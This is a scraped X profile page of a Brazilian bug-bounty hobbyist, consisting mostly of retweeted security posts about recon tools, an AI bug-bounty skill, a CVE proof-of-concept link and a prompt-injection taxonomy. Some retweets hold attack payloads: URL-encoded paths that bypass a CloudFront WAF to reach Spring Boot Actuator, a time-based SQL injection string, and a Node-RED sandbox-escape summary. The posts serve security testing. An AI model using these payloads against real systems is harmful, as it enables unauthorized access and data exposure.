crdØx.49

2.9K posts

crdØx.49 banner
crdØx.49

crdØx.49

@crd0x49

Hunter as hobby...

Brasil Katılım Haziran 2015
439 Takip Edilen3.1K Takipçiler
Sabitlenmiş Tweet
crdØx.49
crdØx.49@crd0x49·
Convencido em postar algumas coisas por aqui e estou pensando em postar alguns reports de Bug Bounty aqui…
Português
0
0
12
4.6K
crdØx.49 retweetledi
X
X@TheMsterDoctor1·
Claude Bug Bounty Hunter - github.com/shuvonsec/clau… Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource
X tweet media
English
9
113
503
27.9K
crdØx.49 retweetledi
AISecHub
AISecHub@AISecHub·
Claude Bug Bounty Hunter - github.com/shuvonsec/clau… Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource
AISecHub tweet media
English
18
211
1.1K
66.3K
crdØx.49 retweetledi
张惠倩
张惠倩@momika233·
Bypass CloudFront WAF rule blocking access to Spring Boot # All bypasses return real Actuator data: GET /%61ctuator/health → HTTP 200 (5122B) ← 'a' encoded GET /a%63tuator/health → HTTP 200 (5123B) ← 'c' encoded GET /ac%74uator/health → HTTP 200 (5122B) ← 't' encoded GET /act%75ator/health → HTTP 200 (5123B) ← 'u' encoded GET /actu%61tor/health → HTTP 200 (5123B) ← 'a' encoded GET /actua%74or/health → HTTP 200 (5123B) ← 't' encoded GET /actuat%6For/health → HTTP 200 (5123B) ← 'o' encoded GET /actuato%72/health → HTTP 200 (5123B) ← 'r' encoded GET /a%63%74uator/health → HTTP 200 (5123B) ← double encoded GET /%61ctua%74or/health → HTTP 200 (5123B) ← double encoded GET /%61%63%74%75%61%74%6F%72/health → HTTP 200 (5122B) ← fully encoded
English
4
69
425
29.1K
crdØx.49 retweetledi
crdØx.49 retweetledi
obscaries
obscaries@obscaries·
Fu-JS 🔎 — a powerful recon tool that crawls JavaScript across subdomains, uncovers hidden endpoints, extracts secrets, builds target-specific wordlists, and recursively expands attack surface from JS files. Perfect for bug bounty hunters focused on client-side recon & endpoint discovery. Source: github.com/th3hack3rwiz/F… #BugBounty #Recon #AppSec #WebSecurity #JavaScript
obscaries tweet media
English
1
34
155
6.5K
crdØx.49 retweetledi
Thierry
Thierry@7hierri·
🔥CSP bypass. Use the following site to find payload. cspbypass.com
Thierry tweet media
English
5
51
311
18.4K
crdØx.49 retweetledi
Hakai Offsec
Hakai Offsec@HakaiOffsec·
A pesquisa no Node-RED 4.0.9 apresenta uma falha crítica no Function Node que permite execução remota de código (RCE). Explorando limitações do módulo vm do Node.js, foi possível burlar a sandbox através da manipulação de construtores JavaScript, acessar o objeto process e carregar o módulo child_process para executar comandos no sistema operacional host. Os testes realizados comprovam a existência de uma vulnerabilidade que burla o isolamento implementado no ambientes possibilitando acesso a dados sensíveis, exigindo controles rigorosos de acesso e isolamento em nível de infraestrutura como mitigação. Confira o arquivo: PT-BR: hakaisecurity.io/pt-br-flow-to-… EN: hakaisecurity.io/flow-to-shell-…
Hakai Offsec tweet media
Português
0
4
7
886
crdØx.49 retweetledi
AISecHub
AISecHub@AISecHub·
Taxonomy of Prompt Injection Methods Prompt injection (PI), the leading OWASP security risk for generative AI (GenAI) applications, is a type of attack where attacker instructions manipulate models, causing unwanted behavior that results in sensitive data leaks, bypassed safety controls, unauthorized access, or actions. This taxonomy diagram: - Catalogs 185+ named techniques across direct and indirect injection paths and attacker prompting methods - Provides a structured hierarchy showing the full risks of fast-moving GenAI threats - Maps the rapidly evolving landscape of PI techniques Source: assets.crowdstrike.com/is/content/cro…
AISecHub tweet media
English
3
37
173
7.4K
crdØx.49 retweetledi
Six2dez 🇵🇸
Six2dez 🇵🇸@Six2dez1·
this grew a bit more than I expected, so I moved everything into a repo and added @ollama (local) + @GeminiApp backends apart from the existing @OpenAI Codex. same @Burp_Suite mcp setup, just easier to reuse Enjoy it! github.com/six2dez/burp-m… #bugbounty #pentest #burp #hacking
Six2dez 🇵🇸 tweet media
Six2dez 🇵🇸@Six2dez1

not sure who needs this, but i couldn’t find any real guide for wiring burp mcp + codex… so i wrote one live vuln reasoning on top of burp, no api keys setup is basically: burp mcp proxy jar, codex config, caddy Guide #burp-mcp–codex-cli" target="_blank" rel="nofollow noopener">pentestbook.six2dez.com/others/burp#bu#PenTest #Burp #bugbountytips

English
6
62
314
39.9K
crdØx.49 retweetledi
ProjectDiscovery
ProjectDiscovery@pdiscoveryio·
Stop missing attack surface behind Round Robin DNS. 🛑 By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips. Use this Command👇 httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt Essential for finding hidden origins and inconsistent WAF protections. #recon #httpx #infosec
ProjectDiscovery tweet media
English
0
71
352
16K
crdØx.49 retweetledi
Hakai Offsec
Hakai Offsec@HakaiOffsec·
A automação é o motor das corporações modernas, mas o que acontece quando as chaves dessa automação ficam expostas? :chave: Em nossas recentes análises de ambientes que dependem do protocolo Kerberos, identificamos um ponto crítico de atenção: os arquivos Keytab. Embora essenciais para que serviços se autentiquem sem interação humana, eles funcionam como "senhas substitutas". Se um atacante acessa esses arquivos, ele assume identidades válidas, garantindo persistência e movimento lateral no Active Directory. Para aprofundar esse diagnóstico e oferecer ferramentas de defesa mais robustas, apresentamos o KeyTabExtractor. Este projeto é um fork aprimorado do keytabextract, desenvolvido para extrair e converter hashes de forma eficiente, permitindo que times de segurança validem a exposição de suas credenciais de serviço. O objetivo? Identificar riscos antes que eles se tornem incidentes e elevar o nível de proteção das infraestruturas baseadas em AD. Quer entender como os arquivos Keytab podem ser o elo mais fraco da sua autenticação e como auditá-los? Confira o artigo completo: hakaisecurity.io/en-a-deep-dive…
Hakai Offsec tweet media
Português
0
1
7
350
crdØx.49 retweetledi
Dark Web Informer
Dark Web Informer@DarkWebInformer·
❗️CVE-2026-21440: A critical path traversal vulnerability affecting the AdonisJS framework, specifically its multipart file upload handling. PoC Exploit: github.com/Ashwesker/Ashw… ▪️CVSS: 9.2 ▪️CVE Published: January 2nd, 2026 ▪️Exploit Published: January 5th, 2026 Details: AdonisJS is a TypeScript-first web framework. A Path Traversal vulnerability in AdonisJS multipart file handling may allow a remote attacker to write arbitrary files to arbitrary locations on the server filesystem. This impacts @adonisjs/bodyparser through version 10.1.1 and 11.x prerelease versions prior to 11.0.0-next.6. This issue has been patched in @adonisjs/bodyparser versions 10.1.2 and 11.0.0-next.6.
Dark Web Informer tweet media
English
3
41
247
16.3K
crdØx.49 retweetledi
Yunus Emre Öztaş
Yunus Emre Öztaş@ynsmroztas·
First report of 2026 🥳🥰🌹 Sometimes services behave as if they have authentication, it's just a matter of how it's added. For those in JSON format, definitely try this: "--headers="Content-Type: application/json\nAuthorization: Bearer [TOKEN_HERE]" \" payload ; {"username":"testuser';SELECT PG_SLEEP(5)--"} #bugbounty #bugbountytips #sqlinjection @intigriti
Yunus Emre Öztaş tweet media
English
6
37
501
19.8K
crdØx.49 retweetledi
Alex Moshkov
Alex Moshkov@amoshkov·
Fala, Brasil! 🇧🇷 Essa é a última chamada para convocar seus amigos e colegas de Cyber pro Positive Hack Talks. Ainda dá tempo de garantir um lugar! 👉 phtalks.ptsecurity.com Confiem em mim: o evento vai entregar tudo. Garanto que eu não brinco em serviço quando o assunto é comunidade. Preparei algo de altíssimo nível, feito com muito carinho e sem enrolação. Só vem! ❤️🔥
Português
4
26
42
5.4K